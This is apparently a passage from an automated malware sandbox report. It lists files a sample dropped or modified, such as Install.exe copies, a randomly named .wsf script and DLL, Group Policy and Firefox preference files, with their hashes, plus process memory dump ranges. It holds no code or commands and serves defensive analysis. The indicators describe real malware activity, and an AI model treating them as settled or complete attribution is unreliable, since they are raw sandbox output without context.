                                                                                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

                                                                                                                            Filesize

                                                                                                                            7KB

                                                                                                                            MD5

                                                                                                                            5967e1fb1f49493eb883daf800ae1d05

                                                                                                                            SHA1

                                                                                                                            5089d795c83b99ec89ab174b1f28f6e4ac95cffb

                                                                                                                            SHA256

                                                                                                                            8469406fb1984d16a8304b377050e57a76fc8ea83f263e63bfbde7f600d73214

                                                                                                                            SHA512

                                                                                                                            c37fa12311add8559629cf430c4d20e420ff1ad0ac9450289f31c48bc2ca7c4da0049aae0386e9bbc5c61b76485e76238af8a308bc6282dd5840d46d46047f73

                                                                                                                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\uj06vnfd.default-release\prefs.js

                                                                                                                            Filesize

                                                                                                                            7KB

                                                                                                                            MD5

                                                                                                                            a86030e754090038ff485fd56098931c

                                                                                                                            SHA1

                                                                                                                            58fb91fbb95a494fdb34c6a58ac11694aee8b97b

                                                                                                                            SHA256

                                                                                                                            1a1b5c4b7ccb500c4ef9e45ff327f7730b4ec1ae9dd26153b70bbc5c7ac354f8

                                                                                                                            SHA512

                                                                                                                            9a79fdca32f941ea23903040bdf6f814cb5a6c23d661913d8f16a2ba774acab1a9e152b47361852d1bc2d52e40ba4585425ef4628511e5d8b15c974e9eeb6093

                                                                                                                          • C:\Windows\Temp\wGQmUIZKEGuxadPB\PcdULMWl\YGxHApANvtCaWYPv.wsf

                                                                                                                            Filesize

                                                                                                                            9KB

                                                                                                                            MD5

                                                                                                                            da1e6b889e7a0465b16e1beb1bb986af

                                                                                                                            SHA1

                                                                                                                            5b9e7e2a77f6773ffb4094a0cf5f0cea94bace33

                                                                                                                            SHA256

                                                                                                                            94b04346e9e32d67ef56d446f7b72f9c3d70f266ecbacaee5be34ac7ce7abbde

                                                                                                                            SHA512

                                                                                                                            491fa80c870c1eed0725404f0ed5e6742503ed1df6964a0a3a3a64b20c09509378545ab795d50a99776ebbdc83d75b5bef85581df7b5c765a63b7b0ff2dbb889

                                                                                                                          • C:\Windows\Temp\wGQmUIZKEGuxadPB\dUjFsKnT\XafmaoT.dll

                                                                                                                            Filesize

                                                                                                                            6.4MB

                                                                                                                            MD5

                                                                                                                            2d4c473cc2ca389edee5cff1f0ed05d0

                                                                                                                            SHA1

                                                                                                                            cf891304e4868c9d621e96438dff6b9300ad5167

                                                                                                                            SHA256

                                                                                                                            76f76da6ec1571a9559645518a08b3114933a58c70eda4fd4dff65dabe2f5e08

                                                                                                                            SHA512

                                                                                                                            85ca1288b7c99066cf44abcf184c7a6acb87ba266f5ed3807c823e35dbeb8e3d0a469180dbc1d0108cfc60ec8565e529647a43ec60c880714b4c73b0975ce41e

                                                                                                                          • C:\Windows\system32\GroupPolicy\Machine\Registry.pol

                                                                                                                            Filesize

                                                                                                                            5KB

                                                                                                                            MD5

                                                                                                                            56f153b8c95b82958d4309c3d4d75c01

                                                                                                                            SHA1

                                                                                                                            c5ca575b4af27ee1e2bb8cbc74d01ca5adec19be

                                                                                                                            SHA256

                                                                                                                            31688ad4614779345cb3cd2956e4e0930051497d72213ff9bcd1514d35b2054d

                                                                                                                            SHA512

                                                                                                                            50f190739391571c95bbd846e828fb1a46f3bbff2f312b4576d9d22d76ff43c28892ee4beb167faf97be17bc17d1300b60d9acb77ac4be741cbaa5bb54c42f38

                                                                                                                          • \Users\Admin\AppData\Local\Temp\7zSCF12.tmp\Install.exe

                                                                                                                            Filesize

                                                                                                                            6.4MB

                                                                                                                            MD5

                                                                                                                            47f5ec2e72f9b41ed6186f70d73db727

                                                                                                                            SHA1

                                                                                                                            0bdcc51450852d092de019360e96608246bc4432

                                                                                                                            SHA256

                                                                                                                            c9ef126ccd3f5fe3e1d3ac789b65de67741feb6994d5786410023b3a58bd634a

                                                                                                                            SHA512

                                                                                                                            031ec5e858b84c16a427860435dc667078438e1adeadeb0ce719f69b418577fbf8af8bbe8a281c4dfb3d89c542bf25ce23a4094aec2e565383dbf2f6a6c7700e

                                                                                                                          • \Users\Admin\AppData\Local\Temp\7zSD105.tmp\Install.exe

                                                                                                                            Filesize

                                                                                                                            6.8MB

                                                                                                                            MD5

                                                                                                                            2798134831906615f341e698d75df451

                                                                                                                            SHA1

                                                                                                                            78acad5747fef6bbf436a06e47e66259b5eab581

                                                                                                                            SHA256

                                                                                                                            e6f73b37ea8a50683f40be08abc30cc907e9b818c09e91a63d36a0d4da90143e

                                                                                                                            SHA512

                                                                                                                            dc238f5fce730c07ce9c80b6457a1caee66ee9d6ed469138ac2910016faf1d01e2545c6743f24056461e14ac6bd489d501ff819e6823fd750a4c31edbe8b2be3

                                                                                                                          • memory/340-54-0x000000001B6E0000-0x000000001B9C2000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            2.9MB

                                                                                                                          • memory/340-55-0x0000000002390000-0x0000000002398000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            32KB

                                                                                                                          • memory/1516-66-0x0000000001330000-0x00000000019FD000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            6.8MB

                                                                                                                          • memory/1516-44-0x0000000010000000-0x00000000105D1000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            5.8MB

                                                                                                                          • memory/1516-88-0x0000000001330000-0x00000000019FD000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            6.8MB

                                                                                                                          • memory/1516-43-0x0000000001330000-0x00000000019FD000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            6.8MB

                                                                                                                          • memory/1620-87-0x0000000000F70000-0x000000000163D000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            6.8MB

                                                                                                                          • memory/1620-135-0x0000000002170000-0x00000000021DB000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            428KB

                                                                                                                          • memory/1620-102-0x00000000019E0000-0x0000000001A65000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            532KB

                                                                                                                          • memory/1620-89-0x0000000010000000-0x00000000105D1000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            5.8MB

                                                                                                                          • memory/1620-332-0x00000000032A0000-0x0000000003377000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            860KB

                                                                                                                          • memory/1620-363-0x0000000000F70000-0x000000000163D000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            6.8MB

                                                                                                                          • memory/1620-318-0x0000000002CD0000-0x0000000002D55000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            532KB

                                                                                                                          • memory/1652-65-0x0000000002340000-0x0000000002348000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            32KB

                                                                                                                          • memory/1652-64-0x000000001B610000-0x000000001B8F2000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            2.9MB

                                                                                                                          • memory/1784-24-0x0000000001300000-0x00000000019CD000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            6.8MB

                                                                                                                          • memory/1784-26-0x0000000001300000-0x00000000019CD000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            6.8MB

                                                                                                                          • memory/1784-25-0x0000000001300000-0x00000000019CD000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            6.8MB

                                                                                                                          • memory/1784-23-0x00000000001A0000-0x000000000086D000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            6.8MB

                                                                                                                          • memory/1784-29-0x0000000010000000-0x00000000105D1000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            5.8MB

                                                                                                                          • memory/1784-42-0x00000000001A0000-0x000000000086D000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            6.8MB

                                                                                                                          • memory/2188-22-0x00000000023A0000-0x0000000002A6D000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            6.8MB

                                                                                                                          • memory/2592-71-0x0000000077A10000-0x0000000077B0A000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            1000KB

                                                                                                                          • memory/2592-70-0x0000000077B10000-0x0000000077C2F000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            1.1MB

                                                                                                                          • memory/2712-351-0x00000000014D0000-0x0000000001AA1000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            5.8MB